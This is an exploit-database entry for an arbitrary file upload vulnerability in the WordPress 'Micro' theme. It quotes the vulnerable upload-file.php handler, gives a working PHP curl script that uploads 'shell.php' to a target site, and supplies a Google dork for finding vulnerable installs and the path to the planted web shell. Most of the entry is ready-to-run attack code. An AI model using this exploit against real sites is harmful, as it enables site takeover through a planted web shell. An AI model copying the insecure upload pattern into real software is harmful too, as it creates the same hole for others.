Wordpress Theme Micro Arbitrary File Upload Vulnerability

2015-02-09T00:00:00
ID 1337DAY-ID-23260
Type zdt
Reporter terrorist
Modified 2015-02-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #########################################################
# Exploit Title: Wordpress Theme Micro Arbitrary File Upload Vulnerability
# Source: https://github.com/UpThemes/Micro-Theme
# Author: terrorist
# Email: [email protected]
# Team: GHC - Georgian Hacking Community
# Category: webapps/php
# Google dork: inurl:wp-content/themes/micro
#########################################################
 
# Vulnerable upload-file.php
<?php
//Upload Security
$upload_security = md5($_SERVER['SERVER_ADDR']);
$uploaddir = base64_decode( $_REQUEST['upload_path'] ) . "/";
if( $_FILES[$upload_security] ):
	$file = $_FILES[$upload_security];
	$file = $uploaddir . strtolower(str_replace('__', '_', str_replace('#', '_', str_replace(' ', '_', basename($file['name'])))));
	
		if (move_uploaded_file( $_FILES[$upload_security]['tmp_name'], $file)):
			if(chmod($file,0777)):
			    echo "success"; 
			else:
				echo "error".$_FILES[$upload_security]['tmp_name'];
			endif;
		else:
		    echo "error".$_FILES[$upload_security]['tmp_name'];
		endif;
endif;
?>

# Exploit
<?php
$uploadfile="shell.php";
$target = "http://target.com";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/micro/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# File path: http://target/wp-content/themes/micro/admin/shell.php

#  0day.today [2018-03-19]  #